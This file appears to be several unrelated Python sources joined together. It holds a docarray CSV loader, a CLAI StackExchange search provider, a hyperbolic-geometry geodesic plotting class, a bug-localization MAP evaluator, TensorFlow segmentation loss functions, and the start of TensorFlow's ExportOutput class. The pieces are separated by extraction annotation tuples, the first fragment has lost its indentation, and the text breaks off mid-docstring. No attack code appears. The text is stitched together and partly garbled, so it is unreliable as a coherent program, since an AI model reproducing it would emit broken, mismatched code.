with open("Data.csv") as file:
movies = DocumentArray(
from_csv(file, field_resolver={'Summary': 'text'})
)
movies = movies.shuffle(seed=randint(0, 2**32 - 1))  # seed must be an int, so randint is called here
for i in range(len(movies)):
movies[i].text=movies[i].text+f"{movies[i].tags.fields['Genres'].string_value}"+f"{movies[i].tags.fields['Title'].string_value}"
print(movies[0].tags.fields['Title'].string_value)
# The print above is just an example to inspect the attributes of the movies DocumentArray
"docarray.document.generators.from_csv"
] | [((216, 266), 'docarray.document.generators.from_csv', 'from_csv', (['file'], {'field_resolver': "{'Summary': 'text'}"}), "(file, field_resolver={'Summary': 'text'})\n", (224, 266), False, 'from docarray.document.generators import from_csv\n')] |
#
# Copyright (C) 2020 IBM. All Rights Reserved.
#
# See LICENSE.txt file in the root directory
# of this source tree for licensing information.
#
import json
from typing import List, Dict
from clai.server.searchlib.providers import Provider
class StackExchange(Provider):
def __init__(self, name: str, description: str, section: dict):
super().__init__(name, description, section)
self.__log_debug__("UNIX StackExchange provider initialized")
def call(self, query: str, limit: int = 1, **kwargs):
self.__log_debug__(
f"call(query={query}, limit={str(limit)}), **kwargs={str(kwargs)})"
)
payload = {"text": query, "limit": limit}
request = self.__send_post_request__(self.base_uri, data=json.dumps(payload))
if request.status_code == 200:
return request.json()["hits"]
return None
def extract_search_result(self, data: List[Dict]) -> str:
return data[0]["Answer"]
def get_printable_output(self, data: List[Dict]) -> str:
lines = [
f"Post: {data[0]['Content'][:384] + ' ...'}",
f"Answer: {data[0]['Answer'][:256] + ' ...'}",
f"Link: {data[0]['Url']}\n",
]
return "\n".join(lines)
| [
"json.dumps"
] | [((762, 781), 'json.dumps', 'json.dumps', (['payload'], {}), '(payload)\n', (772, 781), False, 'import json\n')] |
#!/usr/bin/env python3
# class file uppergeodesic.py
# started as a script to visualize what happens to hyperbolic plane
# if different isometries act on it
import geodesic as gd
import numpy as np
import numpy.linalg as lina
import matplotlib.pyplot as plt
# upper half space as the basic model
class UpperGeodesic(gd.Geodesic):
"""UpperGeodesic line in upper half space
takes endpoints on boundary as arguments
stores x and y data as points in x and y
string "inf" is point at infinity, i.e. y=inf
"""
xmin = 0
xmax = 0
ymin = 0 # just for consistency, shouldn't change
ymax = 0
inf = "inf"
def __init__(self, a, b, color="b", label=''):
"""initialize UpperGeodesic by endpoints
a, b - x values of the endpoints or "inf" if infinity
res is resolution
"""
super().__init__(a, b, color, label)
# adjust the boundaries of hyperbolic space
if self.start != UpperGeodesic.inf:
if self.start < UpperGeodesic.xmin:
UpperGeodesic.xmin = self.start
if self.end > UpperGeodesic.xmax:
UpperGeodesic.xmax = self.end
UpperGeodesic.ymax = (UpperGeodesic.xmax - UpperGeodesic.xmin)/2
@classmethod
def vertical(cls, real):
return cls(cls.inf, real)
@classmethod
def from_midpoint_and_radius(cls, m, r):
"""
        m is the real part of the center of the semicircle; r is its radius
"""
return cls(m-r, m+r)
def sort_se(self):
"""sort start and end"""
if self.end == self.inf:
# just want to assume that the first value is inf if any
self.end = self.start
self.start = self.inf
if self.start != self.inf and self.end < self.start:
# swap a and self.end such that a < self.end
c = self.start
self.start = self.end
self.end = c
def get_data(self):
if self.start == UpperGeodesic.inf:
# vertical line
xs = [self.end, self.end]
ys = [self.ymin, self.ymax]
else:
# calculate semicircle
t = np.linspace(0, np.pi, self.res)
r = (self.end - self.start)/2
xs = r*(1 + np.cos(t)) + self.start
ys = r*np.sin(t)
return(xs, ys)
## the next two functions create new geodesics from existing ones
def new_geod(self, a, b, c, d):
"""return new geodesic by received by moebius trafo
apply the matrix
| a b |
| c d |
on the geodesic self and return the resulting geodesic
"""
start = self.apply_moebius(a, b, c, d, self.start)
end = self.apply_moebius(a, b, c, d, self.end)
return(UpperGeodesic(start, end))
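    # Note (added for clarity): apply_moebius is assumed to act on a boundary
    # point x as the standard Moebius transformation
    #     x -> (a*x + b) / (c*x + d),
    # with the usual conventions for the point at infinity, so new_geod simply
    # maps both endpoints and rebuilds the geodesic from their images.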
def new_from_matrix(self, M):
return self.new_geod(M[0,0], M[0,1], M[1,0], M[1,1])
## apply transformations to ONE geodesic
def apply_matrix(self, M):
self.start = self.apply_moebius(M[0,0], M[0,1], M[1, 0], M[1,1],
self.start)
self.end = self.apply_moebius(M[0,0], M[0,1], M[1, 0], M[1,1],
self.end)
self.sort_se()
def translate_one_geod(self, dx):
if self.start != UpperGeodesic.inf:
self.start += dx
if self.end != UpperGeodesic.inf:
self.end += dx
def translate_one_at_zero(self, dx):
"""inverts at unit sphere, translates and inverts again"""
a = self.inversion_on_unit_circle(self.start)
b = self.inversion_on_unit_circle(self.end)
if a != UpperGeodesic.inf:
a += dx
if b != UpperGeodesic.inf:
b += dx
self.start = self.inversion_on_unit_circle(a)
self.end = self.inversion_on_unit_circle(b)
self.sort_se()
def rotate_one_geod(self, phi):
"""rotates the geodesic on upper half space
conjugate to a rotation around origin in the disc model
"""
if self.start == UpperGeodesic.inf:
alpha = -np.pi/2
else:
alpha = self.from_upper_to_disc(self.start)
beta = self.from_upper_to_disc(self.end)
alpha += phi
beta += phi
self.start = self.from_disc_to_upper(alpha)
self.end = self.from_disc_to_upper(beta)
self.sort_se()
def hyperbolic_translate_one(self, dmult=1.001):
"""translates one geodesic along UpperGeodesic(-1,1)"""
diag = (dmult + 1.0/dmult)/2.0
off = (1.0/dmult - dmult)/2.0
matrix = np.matrix([[diag, off], [off, diag]])
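        # Added note: with dmult = exp(t) this matrix equals
        #     [[cosh(t), -sinh(t)], [-sinh(t), cosh(t)]],
        # which has determinant 1 and fixes the boundary points -1 and 1,
        # i.e. it is a hyperbolic translation along the geodesic from -1 to 1.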
self.apply_matrix(matrix)
# tesselate hyperbolic space
@classmethod
def tesselate(self, depth=10):
"""Tesselates according to SL(2,Z)"""
g0 = UpperGeodesic(-1,1, "r")
g1 = UpperGeodesic(-0.5,self.inf, "r")
g2 = UpperGeodesic(0.5,self.inf, "r")
first = [g0,g1,g2]
for k in range(1, depth):
for g in first:
g.new_geod(1, k, 0, 1)
g.new_geod(1, -k, 0, 1)
kmax = len(UpperGeodesic.all_geods)
for geod in UpperGeodesic.all_geods[:kmax]:
temp = [geod.new_geod(0, -1, 1, 0)]
for k in range(1, 2*depth):
temp.append(geod.new_geod(1, 0, k, 1))
temp.append(geod.new_geod(1, 0, -k, 1))
for k in range(1, depth//2):
for t in temp:
t.new_geod(1, k, 0, 1)
t.new_geod(1, -k, 0, 1)
UpperGeodesic.xmin= -3
UpperGeodesic.xmax= 3
UpperGeodesic.ymax= 3
## plot commands
@classmethod
def set_plot_limits(cls):
highest = max(abs(i)
for i in [cls.ymin, cls.ymax, cls.xmax, cls.xmin])
cls.ax.axis([-highest, highest, 0, highest])
@classmethod
def plot_all(cls):
if UpperGeodesic.ymax <= UpperGeodesic.ymin:
UpperGeodesic.ymax = UpperGeodesic.ymin + 1 # else nothing to plot
super().plot_all()
| [
"numpy.sin",
"numpy.matrix",
"numpy.linspace",
"numpy.cos"
] | [((4613, 4650), 'numpy.matrix', 'np.matrix', (['[[diag, off], [off, diag]]'], {}), '([[diag, off], [off, diag]])\n', (4622, 4650), True, 'import numpy as np\n'), ((2161, 2192), 'numpy.linspace', 'np.linspace', (['(0)', 'np.pi', 'self.res'], {}), '(0, np.pi, self.res)\n', (2172, 2192), True, 'import numpy as np\n'), ((2302, 2311), 'numpy.sin', 'np.sin', (['t'], {}), '(t)\n', (2308, 2311), True, 'import numpy as np\n'), ((2259, 2268), 'numpy.cos', 'np.cos', (['t'], {}), '(t)\n', (2265, 2268), True, 'import numpy as np\n')] |
import os
import json
def evaluation(results, all_res, bug_data, storage_path):
map_value = 0
map_value_all = 0
ap_value = {}
count = 0
for bug_id, bug_cont in bug_data.items():
temp1 = 0
temp2 = 0
ap_tmp = 0
all_ap_tmp = 0
truth_num = 0
file_paths = bug_cont["fixed_files"]
if not len(file_paths) == 0:
for file_path in file_paths:
for i in range(all_res.shape[0]):
if all_res[i]["bug"][0] == bug_id.encode():
for j in range(all_res.shape[1]):
if all_res[i][j]["file"] == file_path.encode():
truth_num += 1
if truth_num > 0:
count += 1
if not truth_num == 0:
ap_value[bug_id] = {}
for i in range(results.shape[0]):
if results[i]["bug"][0] == bug_id.encode():
for j in range(results.shape[1]):
if results[i][j]["file"].decode() in file_paths:
temp1 += 1
ap_tmp += temp1/(j+1.0)
for i in range(all_res.shape[0]):
if all_res[i]["bug"][0] == bug_id.encode():
for j in range(all_res.shape[1]):
if all_res[i][j]["file"].decode() in file_paths:
temp2 += 1
all_ap_tmp += temp2/(j+1.0)
ap_value[bug_id]["AP@top10"] = ap_tmp / len(file_paths)
ap_value[bug_id]["AP@all"] = all_ap_tmp / len(file_paths)
past_ap_value = {}
if os.path.exists(os.path.join(storage_path, "evaluation.json")):
with open(os.path.join(storage_path, "evaluation.json"), "r") as f:
past_ap_value = json.load(f)
past_ap_value.update(ap_value)
with open(os.path.join(storage_path, "evaluation.json"), "w") as f:
json.dump(past_ap_value, f)
if not count == 0:
for ap in ap_value.values():
map_value_all += ap["AP@all"]
map_value += ap["AP@top10"]
map_value /= count
map_value_all /= count
else:
map_value = 0
map_value_all = 0
print("The MAP @ top 10 is", map_value)
print("The MAP @ all results is", map_value_all) | [
"json.load",
"os.path.join",
"json.dump"
] | [((1708, 1753), 'os.path.join', 'os.path.join', (['storage_path', '"""evaluation.json"""'], {}), "(storage_path, 'evaluation.json')\n", (1720, 1753), False, 'import os\n'), ((1993, 2020), 'json.dump', 'json.dump', (['past_ap_value', 'f'], {}), '(past_ap_value, f)\n', (2002, 2020), False, 'import json\n'), ((1860, 1872), 'json.load', 'json.load', (['f'], {}), '(f)\n', (1869, 1872), False, 'import json\n'), ((1927, 1972), 'os.path.join', 'os.path.join', (['storage_path', '"""evaluation.json"""'], {}), "(storage_path, 'evaluation.json')\n", (1939, 1972), False, 'import os\n'), ((1774, 1819), 'os.path.join', 'os.path.join', (['storage_path', '"""evaluation.json"""'], {}), "(storage_path, 'evaluation.json')\n", (1786, 1819), False, 'import os\n')] |
"""
Created on Thu Sept 24 2020-
@author: <NAME>
GitHub username: esgomezm
"""
import tensorflow as tf
from tensorflow.keras import backend as K
from tensorflow.keras.losses import binary_crossentropy
import numpy as np
from tensorflow.keras import losses
# --------------------------------
# ## Unet with tf 2.0.0
# https://www.kaggle.com/advaitsave/tensorflow-2-nuclei-segmentation-unet
# ## binary weighted loss example
# https://www.kaggle.com/lyakaap/weighing-boundary-pixels-loss-script-by-keras2
# https://stackoverflow.com/questions/48555820/keras-binary-segmentation-add-weight-to-loss-function/48577360
# https://stackoverflow.com/questions/55213599/u-net-with-pixel-wise-weighted-cross-entropy-input-dimension-errors
# https://lars76.github.io/neural-networks/object-detection/losses-for-segmentation/
# https://stackoverflow.com/questions/46858016/keras-custom-loss-function-to-pass-arguments-other-than-y-true-and-y-pred
# --------------------------------
# weight: weighted tensor (same shape as mask image)
def weighted_bce(y_true, y_pred, weight):
# avoiding overflow
epsilon = 1e-7
y_pred = K.clip(y_pred, epsilon, 1. - epsilon)
logit_y_pred = K.log(y_pred / (1. - y_pred))
# https://www.tensorflow.org/api_docs/python/tf/nn/weighted_cross_entropy_with_logits
loss = (1. - y_true) * logit_y_pred + (1. + (weight - 1.) * y_true) * \
(K.log(1. + K.exp(-K.abs(logit_y_pred))) + K.maximum(-logit_y_pred, 0.))
return K.sum(loss) / K.sum(weight)
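# Note added for clarity: the expression above is the numerically stable form of the
# weighted cross entropy with logits,
#     loss = (1 - y) * x + (1 + (w - 1) * y) * log(1 + exp(-x)),
# where x is the logit; log(1 + exp(-x)) is rewritten as
# log(1 + exp(-|x|)) + max(-x, 0) to avoid overflow for large |x|.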
def weighted_dice(y_true, y_pred, weight):
smooth = 1.
w, m1, m2 = weight * weight, y_true, y_pred
intersection = (m1 * m2)
score = (2. * K.sum(w * intersection) + smooth) / (K.sum(w * m1) + K.sum(w * m2) + smooth)
loss = 1. - K.sum(score)
return loss
def weighted_bce_dice_loss(y_true, y_pred):
y_true = K.cast(y_true, 'float32')
y_pred = K.cast(y_pred, 'float32')
# if we want to get same size of output, kernel size must be odd number
averaged_mask = K.pool2d(
y_true, pool_size=(11, 11), strides=(1, 1), padding='same', pool_mode='avg')
border = K.cast(K.greater(averaged_mask, 0.005), 'float32') * K.cast(K.less(averaged_mask, 0.995), 'float32')
weight = K.ones_like(averaged_mask)
w0 = K.sum(weight)
weight += border * 2
w1 = K.sum(weight)
weight *= (w0 / w1)
loss = weighted_bce(y_true, y_pred, weight) + weighted_dice(y_true, y_pred, weight)
return loss
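# Usage sketch (the model and optimizer names are illustrative, not part of this file):
#     model.compile(optimizer='adam', loss=weighted_bce_dice_loss)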
def bce_loss(X):
# y_true, y_pred, weight = X
y_true, y_pred = X
loss = binary_crossentropy(y_true, y_pred)
loss = tf.expand_dims(loss, 3)
# loss = multiply([loss, weight])
return loss
def identity_loss(y_true, y_pred):
# return K.mean(y_pred, axis=-1)
return y_pred
def jaccard_multiple_output(y_true, y_pred, from_logits = True):
"""Define Jaccard index for multiple labels.
Args:
y_true (tensor): ground truth masks.
y_pred (tensor): predicted masks.
Return:
jac (tensor): Jaccard index value
"""
    if from_logits:
        # run activation to evaluate the jaccard index
        y_pred_ = tf.sigmoid(y_pred)
    else:
        y_pred_ = y_pred
    y_pred_ = y_pred_ > 0.5
y_pred_ = tf.cast(y_pred_, dtype=tf.int8)
y_true_ = tf.cast(y_true, dtype=tf.int8)
TP = tf.math.count_nonzero(y_pred_ * y_true_)
FP = tf.math.count_nonzero(y_pred_ * (1 - y_true_))
FN = tf.math.count_nonzero((1 - y_pred_) * y_true_)
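    # Jaccard index J(A, B) = |A ∩ B| / |A ∪ B| = TP / (TP + FP + FN);
    # the tf.cond below guards against division by zero when both masks are empty.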
jac = tf.cond(tf.greater((TP + FP + FN), 0), lambda: TP / (TP + FP + FN),
lambda: tf.cast(0.000, dtype='float64'))
return jac
def jaccard_sparse(y_true, y_pred, skip_background=True):
"""Define Jaccard index (multi-class).
Args:
y_true (tensor): ground truth masks.
y_pred (tensor): predicted masks.
skip_background (bool, optional): skip background label.
Return:
jac (tensor): Jaccard index value
"""
# number of classes (last dimension of predictions)
num_classes = tf.shape(y_pred)[-1]
# one_hot representation of predicted segmentation
y_pred_ = tf.cast(y_pred, dtype=tf.int32)
y_pred_ = tf.one_hot(tf.math.argmax(y_pred_, axis=-1), num_classes, axis=-1)
# one_hot representation of ground truth segmentation
y_true_ = tf.cast(y_true[...,0], dtype=tf.int32)
y_true_ = tf.one_hot(y_true_, num_classes, axis=-1)
if skip_background:
y_pred_ = y_pred_[...,1:]
y_true_ = y_true_[...,1:]
TP = tf.math.count_nonzero(y_pred_ * y_true_)
FP = tf.math.count_nonzero(y_pred_ * (y_true_ - 1))
FN = tf.math.count_nonzero((y_pred_ - 1) * y_true_)
jac = tf.cond(tf.greater((TP + FP + FN), 0), lambda: TP / (TP + FP + FN),
lambda: tf.cast(0.000, dtype='float64'))
return jac
def jaccard_cce(y_true, y_pred, skip_background=True):
"""Define Jaccard index for multiple labels.
Args:
y_true (tensor): ground truth masks.
y_pred (tensor): predicted masks.
skip_background (bool, optional): skip 0-label from calculation
Return:
jac (tensor): Jaccard index value
"""
# We read the number of classes from the last dimension of the true labels
num_classes = tf.shape(y_true)[-1]
# one_hot representation of predicted segmentation after argmax
y_pred_ = tf.cast(y_pred, dtype=tf.float32)
y_pred_ = tf.one_hot(tf.math.argmax(y_pred_, axis=-1), num_classes, axis=-1)
# y_true is already one-hot encoded
y_true_ = tf.cast(y_true, dtype=tf.float32)
# skip background pixels from the Jaccard index calculation
if skip_background:
y_true_ = y_true_[...,1:]
y_pred_ = y_pred_[...,1:]
TP = tf.math.count_nonzero(y_pred_ * y_true_)
FP = tf.math.count_nonzero(y_pred_ * (y_true_ - 1))
FN = tf.math.count_nonzero((y_pred_ - 1) * y_true_)
jac = tf.cond(tf.greater((TP + FP + FN), 0), lambda: TP / (TP + FP + FN),
lambda: tf.cast(0.000, dtype='float64'))
return jac
## Code taken from DeepSTORM at ZeroCostDL4Mic. Please cite when using it
# Define a matlab like gaussian 2D filter
def matlab_style_gauss2D(shape=(7,7),sigma=1):
"""
2D gaussian filter - should give the same result as:
MATLAB's fspecial('gaussian',[shape],[sigma])
"""
m,n = [(ss-1.)/2. for ss in shape]
y,x = np.ogrid[-m:m+1,-n:n+1]
h = np.exp( -(x*x + y*y) / (2.*sigma*sigma) )
    h = h.astype(dtype=K.floatx())  # astype returns a new array, so keep the result
h[ h < np.finfo(h.dtype).eps*h.max() ] = 0
sumh = h.sum()
if sumh != 0:
h /= sumh
h = h*2.0
h = h.astype('float32')
return h
# Expand the filter dimensions
## We changed the kernel size from 7 to 10.
# psf_heatmap = matlab_style_gauss2D(shape=(14, 14), sigma=2)
# gfilter = tf.reshape(psf_heatmap, [14, 14, 1, 1])
# Combined MSE + L1 loss
def L1L2loss(input_shape, gfilter, strides=(1, 1)):
"""
Args:
input_shape: (512,512,1)
    Returns:
        a loss function combining an MSE term on Gaussian-smoothed heatmaps
        with an L1 penalty on the predicted spikes.
"""
def bump_mse(heatmap_true, spikes_pred):
# generate the heatmap corresponding to the predicted spikes
if len(strides) == 2:
heatmap_pred = K.conv2d(spikes_pred, gfilter, strides=strides, padding='same')
elif len(strides) == 3:
heatmap_pred = K.conv3d(spikes_pred, gfilter, strides=strides, padding='same')
# heatmaps MSE
loss_heatmaps = losses.mean_squared_error(heatmap_true,heatmap_pred)
# l1 on the predicted spikes
loss_spikes = losses.mean_absolute_error(spikes_pred,tf.zeros(input_shape))
return loss_heatmaps + loss_spikes
return bump_mse
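# Usage sketch (mirrors the commented example above; the model name is illustrative):
#     psf_heatmap = matlab_style_gauss2D(shape=(14, 14), sigma=2)
#     gfilter = tf.reshape(psf_heatmap, [14, 14, 1, 1])
#     model.compile(optimizer='adam', loss=L1L2loss((512, 512, 1), gfilter))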
| [
"tensorflow.keras.backend.log",
"tensorflow.shape",
"tensorflow.keras.backend.floatx",
"tensorflow.keras.backend.greater",
"tensorflow.keras.backend.ones_like",
"tensorflow.keras.losses.binary_crossentropy",
"tensorflow.cast",
"tensorflow.keras.backend.conv2d",
"tensorflow.keras.backend.conv3d",
"... | [((1129, 1167), 'tensorflow.keras.backend.clip', 'K.clip', (['y_pred', 'epsilon', '(1.0 - epsilon)'], {}), '(y_pred, epsilon, 1.0 - epsilon)\n', (1135, 1167), True, 'from tensorflow.keras import backend as K\n'), ((1186, 1216), 'tensorflow.keras.backend.log', 'K.log', (['(y_pred / (1.0 - y_pred))'], {}), '(y_pred / (1.0 - y_pred))\n', (1191, 1216), True, 'from tensorflow.keras import backend as K\n'), ((1843, 1868), 'tensorflow.keras.backend.cast', 'K.cast', (['y_true', '"""float32"""'], {}), "(y_true, 'float32')\n", (1849, 1868), True, 'from tensorflow.keras import backend as K\n'), ((1882, 1907), 'tensorflow.keras.backend.cast', 'K.cast', (['y_pred', '"""float32"""'], {}), "(y_pred, 'float32')\n", (1888, 1907), True, 'from tensorflow.keras import backend as K\n'), ((2004, 2093), 'tensorflow.keras.backend.pool2d', 'K.pool2d', (['y_true'], {'pool_size': '(11, 11)', 'strides': '(1, 1)', 'padding': '"""same"""', 'pool_mode': '"""avg"""'}), "(y_true, pool_size=(11, 11), strides=(1, 1), padding='same',\n pool_mode='avg')\n", (2012, 2093), True, 'from tensorflow.keras import backend as K\n'), ((2226, 2252), 'tensorflow.keras.backend.ones_like', 'K.ones_like', (['averaged_mask'], {}), '(averaged_mask)\n', (2237, 2252), True, 'from tensorflow.keras import backend as K\n'), ((2262, 2275), 'tensorflow.keras.backend.sum', 'K.sum', (['weight'], {}), '(weight)\n', (2267, 2275), True, 'from tensorflow.keras import backend as K\n'), ((2310, 2323), 'tensorflow.keras.backend.sum', 'K.sum', (['weight'], {}), '(weight)\n', (2315, 2323), True, 'from tensorflow.keras import backend as K\n'), ((2538, 2573), 'tensorflow.keras.losses.binary_crossentropy', 'binary_crossentropy', (['y_true', 'y_pred'], {}), '(y_true, y_pred)\n', (2557, 2573), False, 'from tensorflow.keras.losses import binary_crossentropy\n'), ((2585, 2608), 'tensorflow.expand_dims', 'tf.expand_dims', (['loss', '(3)'], {}), '(loss, 3)\n', (2599, 2608), True, 'import tensorflow as tf\n'), ((3206, 3237), 'tensorflow.cast', 'tf.cast', (['y_pred_'], {'dtype': 'tf.int8'}), '(y_pred_, dtype=tf.int8)\n', (3213, 3237), True, 'import tensorflow as tf\n'), ((3252, 3282), 'tensorflow.cast', 'tf.cast', (['y_true'], {'dtype': 'tf.int8'}), '(y_true, dtype=tf.int8)\n', (3259, 3282), True, 'import tensorflow as tf\n'), ((3293, 3333), 'tensorflow.math.count_nonzero', 'tf.math.count_nonzero', (['(y_pred_ * y_true_)'], {}), '(y_pred_ * y_true_)\n', (3314, 3333), True, 'import tensorflow as tf\n'), ((3343, 3389), 'tensorflow.math.count_nonzero', 'tf.math.count_nonzero', (['(y_pred_ * (1 - y_true_))'], {}), '(y_pred_ * (1 - y_true_))\n', (3364, 3389), True, 'import tensorflow as tf\n'), ((3399, 3445), 'tensorflow.math.count_nonzero', 'tf.math.count_nonzero', (['((1 - y_pred_) * y_true_)'], {}), '((1 - y_pred_) * y_true_)\n', (3420, 3445), True, 'import tensorflow as tf\n'), ((4117, 4148), 'tensorflow.cast', 'tf.cast', (['y_pred'], {'dtype': 'tf.int32'}), '(y_pred, dtype=tf.int32)\n', (4124, 4148), True, 'import tensorflow as tf\n'), ((4312, 4351), 'tensorflow.cast', 'tf.cast', (['y_true[..., 0]'], {'dtype': 'tf.int32'}), '(y_true[..., 0], dtype=tf.int32)\n', (4319, 4351), True, 'import tensorflow as tf\n'), ((4365, 4406), 'tensorflow.one_hot', 'tf.one_hot', (['y_true_', 'num_classes'], {'axis': '(-1)'}), '(y_true_, num_classes, axis=-1)\n', (4375, 4406), True, 'import tensorflow as tf\n'), ((4514, 4554), 'tensorflow.math.count_nonzero', 'tf.math.count_nonzero', (['(y_pred_ * y_true_)'], {}), '(y_pred_ * y_true_)\n', (4535, 4554), True, 'import tensorflow as 
tf\n'), ((4564, 4610), 'tensorflow.math.count_nonzero', 'tf.math.count_nonzero', (['(y_pred_ * (y_true_ - 1))'], {}), '(y_pred_ * (y_true_ - 1))\n', (4585, 4610), True, 'import tensorflow as tf\n'), ((4620, 4666), 'tensorflow.math.count_nonzero', 'tf.math.count_nonzero', (['((y_pred_ - 1) * y_true_)'], {}), '((y_pred_ - 1) * y_true_)\n', (4641, 4666), True, 'import tensorflow as tf\n'), ((5380, 5413), 'tensorflow.cast', 'tf.cast', (['y_pred'], {'dtype': 'tf.float32'}), '(y_pred, dtype=tf.float32)\n', (5387, 5413), True, 'import tensorflow as tf\n'), ((5554, 5587), 'tensorflow.cast', 'tf.cast', (['y_true'], {'dtype': 'tf.float32'}), '(y_true, dtype=tf.float32)\n', (5561, 5587), True, 'import tensorflow as tf\n'), ((5750, 5790), 'tensorflow.math.count_nonzero', 'tf.math.count_nonzero', (['(y_pred_ * y_true_)'], {}), '(y_pred_ * y_true_)\n', (5771, 5790), True, 'import tensorflow as tf\n'), ((5800, 5846), 'tensorflow.math.count_nonzero', 'tf.math.count_nonzero', (['(y_pred_ * (y_true_ - 1))'], {}), '(y_pred_ * (y_true_ - 1))\n', (5821, 5846), True, 'import tensorflow as tf\n'), ((5856, 5902), 'tensorflow.math.count_nonzero', 'tf.math.count_nonzero', (['((y_pred_ - 1) * y_true_)'], {}), '((y_pred_ - 1) * y_true_)\n', (5877, 5902), True, 'import tensorflow as tf\n'), ((6426, 6474), 'numpy.exp', 'np.exp', (['(-(x * x + y * y) / (2.0 * sigma * sigma))'], {}), '(-(x * x + y * y) / (2.0 * sigma * sigma))\n', (6432, 6474), True, 'import numpy as np\n'), ((1478, 1489), 'tensorflow.keras.backend.sum', 'K.sum', (['loss'], {}), '(loss)\n', (1483, 1489), True, 'from tensorflow.keras import backend as K\n'), ((1492, 1505), 'tensorflow.keras.backend.sum', 'K.sum', (['weight'], {}), '(weight)\n', (1497, 1505), True, 'from tensorflow.keras import backend as K\n'), ((1755, 1767), 'tensorflow.keras.backend.sum', 'K.sum', (['score'], {}), '(score)\n', (1760, 1767), True, 'from tensorflow.keras import backend as K\n'), ((3145, 3163), 'tensorflow.sigmoid', 'tf.sigmoid', (['y_pred'], {}), '(y_pred)\n', (3155, 3163), True, 'import tensorflow as tf\n'), ((3465, 3492), 'tensorflow.greater', 'tf.greater', (['(TP + FP + FN)', '(0)'], {}), '(TP + FP + FN, 0)\n', (3475, 3492), True, 'import tensorflow as tf\n'), ((4022, 4038), 'tensorflow.shape', 'tf.shape', (['y_pred'], {}), '(y_pred)\n', (4030, 4038), True, 'import tensorflow as tf\n'), ((4174, 4206), 'tensorflow.math.argmax', 'tf.math.argmax', (['y_pred_'], {'axis': '(-1)'}), '(y_pred_, axis=-1)\n', (4188, 4206), True, 'import tensorflow as tf\n'), ((4686, 4713), 'tensorflow.greater', 'tf.greater', (['(TP + FP + FN)', '(0)'], {}), '(TP + FP + FN, 0)\n', (4696, 4713), True, 'import tensorflow as tf\n'), ((5277, 5293), 'tensorflow.shape', 'tf.shape', (['y_true'], {}), '(y_true)\n', (5285, 5293), True, 'import tensorflow as tf\n'), ((5439, 5471), 'tensorflow.math.argmax', 'tf.math.argmax', (['y_pred_'], {'axis': '(-1)'}), '(y_pred_, axis=-1)\n', (5453, 5471), True, 'import tensorflow as tf\n'), ((5922, 5949), 'tensorflow.greater', 'tf.greater', (['(TP + FP + FN)', '(0)'], {}), '(TP + FP + FN, 0)\n', (5932, 5949), True, 'import tensorflow as tf\n'), ((7406, 7459), 'tensorflow.keras.losses.mean_squared_error', 'losses.mean_squared_error', (['heatmap_true', 'heatmap_pred'], {}), '(heatmap_true, heatmap_pred)\n', (7431, 7459), False, 'from tensorflow.keras import losses\n'), ((2119, 2150), 'tensorflow.keras.backend.greater', 'K.greater', (['averaged_mask', '(0.005)'], {}), '(averaged_mask, 0.005)\n', (2128, 2150), True, 'from tensorflow.keras import backend as K\n'), ((2172, 
2200), 'tensorflow.keras.backend.less', 'K.less', (['averaged_mask', '(0.995)'], {}), '(averaged_mask, 0.995)\n', (2178, 2200), True, 'from tensorflow.keras import backend as K\n'), ((3551, 3580), 'tensorflow.cast', 'tf.cast', (['(0.0)'], {'dtype': '"""float64"""'}), "(0.0, dtype='float64')\n", (3558, 3580), True, 'import tensorflow as tf\n'), ((4772, 4801), 'tensorflow.cast', 'tf.cast', (['(0.0)'], {'dtype': '"""float64"""'}), "(0.0, dtype='float64')\n", (4779, 4801), True, 'import tensorflow as tf\n'), ((6008, 6037), 'tensorflow.cast', 'tf.cast', (['(0.0)'], {'dtype': '"""float64"""'}), "(0.0, dtype='float64')\n", (6015, 6037), True, 'import tensorflow as tf\n'), ((6487, 6497), 'tensorflow.keras.backend.floatx', 'K.floatx', ([], {}), '()\n', (6495, 6497), True, 'from tensorflow.keras import backend as K\n'), ((7170, 7233), 'tensorflow.keras.backend.conv2d', 'K.conv2d', (['spikes_pred', 'gfilter'], {'strides': 'strides', 'padding': '"""same"""'}), "(spikes_pred, gfilter, strides=strides, padding='same')\n", (7178, 7233), True, 'from tensorflow.keras import backend as K\n'), ((7558, 7579), 'tensorflow.zeros', 'tf.zeros', (['input_shape'], {}), '(input_shape)\n', (7566, 7579), True, 'import tensorflow as tf\n'), ((1437, 1466), 'tensorflow.keras.backend.maximum', 'K.maximum', (['(-logit_y_pred)', '(0.0)'], {}), '(-logit_y_pred, 0.0)\n', (1446, 1466), True, 'from tensorflow.keras import backend as K\n'), ((1662, 1685), 'tensorflow.keras.backend.sum', 'K.sum', (['(w * intersection)'], {}), '(w * intersection)\n', (1667, 1685), True, 'from tensorflow.keras import backend as K\n'), ((1699, 1712), 'tensorflow.keras.backend.sum', 'K.sum', (['(w * m1)'], {}), '(w * m1)\n', (1704, 1712), True, 'from tensorflow.keras import backend as K\n'), ((1715, 1728), 'tensorflow.keras.backend.sum', 'K.sum', (['(w * m2)'], {}), '(w * m2)\n', (1720, 1728), True, 'from tensorflow.keras import backend as K\n'), ((7294, 7357), 'tensorflow.keras.backend.conv3d', 'K.conv3d', (['spikes_pred', 'gfilter'], {'strides': 'strides', 'padding': '"""same"""'}), "(spikes_pred, gfilter, strides=strides, padding='same')\n", (7302, 7357), True, 'from tensorflow.keras import backend as K\n'), ((6510, 6527), 'numpy.finfo', 'np.finfo', (['h.dtype'], {}), '(h.dtype)\n', (6518, 6527), True, 'import numpy as np\n'), ((1413, 1432), 'tensorflow.keras.backend.abs', 'K.abs', (['logit_y_pred'], {}), '(logit_y_pred)\n', (1418, 1432), True, 'from tensorflow.keras import backend as K\n')] |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Classes for different types of export output."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import six
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.saved_model import signature_def_utils
class ExportOutput(object):
"""Represents an output of a model that can be served.
These typically correspond to model heads.
"""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def as_signature_def(self, receiver_tensors):
"""Generate a SignatureDef proto for inclusion in a MetaGraphDef.
The SignatureDef will specify outputs as described in this ExportOutput,
and will use the provided receiver_tensors as inputs.
